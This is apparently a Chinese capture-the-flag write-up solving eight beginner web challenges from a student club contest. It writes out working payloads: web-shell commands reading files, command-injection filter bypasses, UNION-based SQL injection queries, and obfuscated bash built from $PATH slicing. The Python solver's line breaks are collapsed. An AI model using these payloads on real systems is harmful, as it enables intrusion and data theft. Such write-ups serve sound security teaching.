目录

 

1、robots

2、NOF12

3、get_post

4、好事慢磨

5、uploads

6、rce

7、ezsql

8、RCE

---

 

1、robots

robots 协议又叫爬虫协议，访问 robots.txt

继续访问 /JAY.php

拿到 flag：flag{hello_Do_YOU_KONw_JAY!}

 

2、NOF12

F12 和右键都被禁用

方法（1）

通过浏览器点击打开开发人员工具

源码里看到 flag：flag{wellcome_TO_CTF!!!}

方法（2）

提前打开 F12 

再访问进入题目地址

 

3、get_post

基本的 get 和 post 传参方式，payload：

?a=helloctf
post：b=666

两次 base64 解码

拿到 flag：flag{hello!!!it_so_easy}

 

4、好事慢磨

简单测试一下可以发现 flag 一共有 300 位

F12 在源码里看到 post 请求参数名为 hacker

试一下，确实可以正常回显

用 python 写个脚本跑就可以了

exp：

# @author：Myon
# @time：20240828
import requests
import reurl = 'http://snert.net.cn:10001/'
out = ''
for i in range(300):payload = {'hacker': f'{i}'}# print(payload)res = requests.post(url, data=payload)# print(res.text)match = re.search(r'：(.+)', res.text)  # 匹配冒号后面的所有字符out += match.group(1)print(out)

拿到 flag：

flag{pa2hpl-pkfwbv42tnvv-qeviypz7z4xorksoo95so-9uv3m5jxq5mbhm154wjl3068eo-3985u36ahbqj7my1d7bv2ld2avi63utr5n3vga6dlgfnxjy-jzzvine7hx6mtl668v2cp9z46zem696rnkvw174couqof1e7d82hwutf-cfwayhsyebppztvmrgmo7dl1qf-dewym0i4y4v8kvd1cn1v1oqlqxbeqz5t1mt2kburhafuivsz7khbvcum-xbne6rgi9losgjii-3bqou8l7j5zjm264h9z}
 

 

5、uploads

没有任何过滤，直接传一句话木马

调用，在上一层目录看到 flag.php

cmd=system('ls ../');

读取：

cmd=system('tac ../f*');

拿到 flag：flag{BDQLKdC6yDJ2DxphWzJrWDjQsHnHTZ3s}

 

6、rce

代码审计： 

post 传入 a，如果传入的内容里面有 cat 或者 flag，都会被替换为空，之后输出替换后剩下的内容，再将其传给 system 函数作为参数进行调用，输出返回的结果。

先看一下当前目录下有什么：

a=ls

有一个叫 flag.php 的东西，注意这里有点容易看错，我一开始看成了 lsflag.php，其实前面的 ls 是我们执行的命令被 echo 输出了，所有真正的文件名应该是 flag.php。

方法（1）：换一个读取命令，不使用 cat，结合通配绕过

payload：

a=tac f*

拿到 flag：flag{TTBnmqQa3cX0Hg6D522Y2Y7Pn3PZtog4}

当然还有很多其他的命令可以用，比如反向输出，问号进行通配等：

a=rev fla?.???

方法（2）：双写绕过

a=cacatt flaflagg.php

替换掉其中的 cat 和 flag 剩下的就是 cat flag.php 

查看源代码即可看到 flag

 

7、ezsql

查询 Alex

返回 ID: 1 - Name: Alex - Password: Alex_123 

 

如果你查我的名字其实可以得到一个小提示

就是没有任何过滤的 sql 注入，关于 sqlmap 跑的我就不演示了，下面简单说一下手动注入的流程。

输入单引号报错：如果是萌新会很不理解为什么要这样为什么会报错，正如我提示里面所说，先去了解 sql 注入的原理吧。

使用 # 注释掉后面内容，闭合成功

由前面 Alex 的查询结果回显可以推断字段数为 3

直接查数据库下的所有表名： 

' union select 1,2,table_name from information_schema.tables where table_schema=database()#

可以看到存在一个名为 googthings 的表，查该表下的列名：

' union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='goodthings'#

列名也是 username 和 password 

正如一开始题目所说，密码里面藏着东西，那么这里其实都不用查列名，直接查 goodthings

这个表下面的 password 列的内容即可：

' union select 1,2,password from goodthings #

拿到 flag：flag{war6m9-gyn6rl6q8ik1qp-pe4eqttoos7tl6o-dvxm9jmt3pk}

 

8、RCE

限制死了只能使用这些字符：{(FAST:HIP)}$~

出这道题的想法来源于我之前刷到过的两个题，一个是 Linux 内置环境变量

参考我之前的博客：

ctfshow-web入门-命令执行（web118详解）Linux 内置变量与Bash切片_web 118 ctfshow-CSDN博客https://blog.csdn.net/Myon5/article/details/140145005

光有 Linux 内置环境变量还不够，我们还需要用到切片操作，因此还需要构造数字，同样参考我之前的博客：web57

ctfshow-web入门-命令执行（web56、web57、web58）_ctfshow web57-CSDN博客https://blog.csdn.net/Myon5/article/details/139746224

这里我们利用上述字符可以构造出 $PATH

这个东西的前面部分基本上都是一样的：

 即：/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 

所以这里默认这部分是我们已知的，我们利用切片操作就可以构造出 /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 里面的任意一个字符，进而我们就可以继续构造 ls、nl 等命令，空格我们使用 ${IFS} 代替。

详细看完我前两篇博客所说的内容，你就会真正理解 payload 是如何构造的。

构造 payload 读取根目录下面的文件：

ls /

即 

嘻嘻嘻=${PATH:$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(()))))))):$((~$(($((~$(())))$((~$(())))))))}${PATH:$((~$(($((~$(())))$((~$(())))$((~$(()))))))):$((~$(($((~$(())))$((~$(())))))))}${IFS}${PATH:$(()):$((~$(($((~$(())))$((~$(())))))))}

未见 flag 文件，但是存在一个名为 burn 的文件，这个文件名在根目录下是不常见的，结合 php 源码勇师傅有注释说：# flag被我烧掉了，burn 就是燃烧的意思。

构造 payload 读取这个文件：

nl /burn

即 

嘻嘻嘻=${PATH:$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(()))))))):$((~$(($((~$(())))$((~$(())))))))}${PATH:$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(()))))))):$((~$(($((~$(())))$((~$(())))))))}${IFS}${PATH:$(()):$((~$(($((~$(())))$((~$(())))))))}${PATH:$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(()))))))):$((~$(($((~$(())))$((~$(())))))))}${PATH:$((~$(($((~$(())))$((~$(()))))))):$((~$(($((~$(())))$((~$(())))))))}${PATH:$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(()))))))):$((~$(($((~$(())))$((~$(())))))))}${PATH:$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(()))))))):$((~$(($((~$(())))$((~$(())))))))}

拿到 flag：flag{r18s4bcp-ctvmmijn6a2g7-pnbrwudl}

 

这个题算是勇师傅最后弄的一个压轴题吧，不压一下第一天上午 web 就全穿了，除了这道，这次的 web 题都出的非常简单和基础，最后，期待大一大二的加入 SNERT 学习！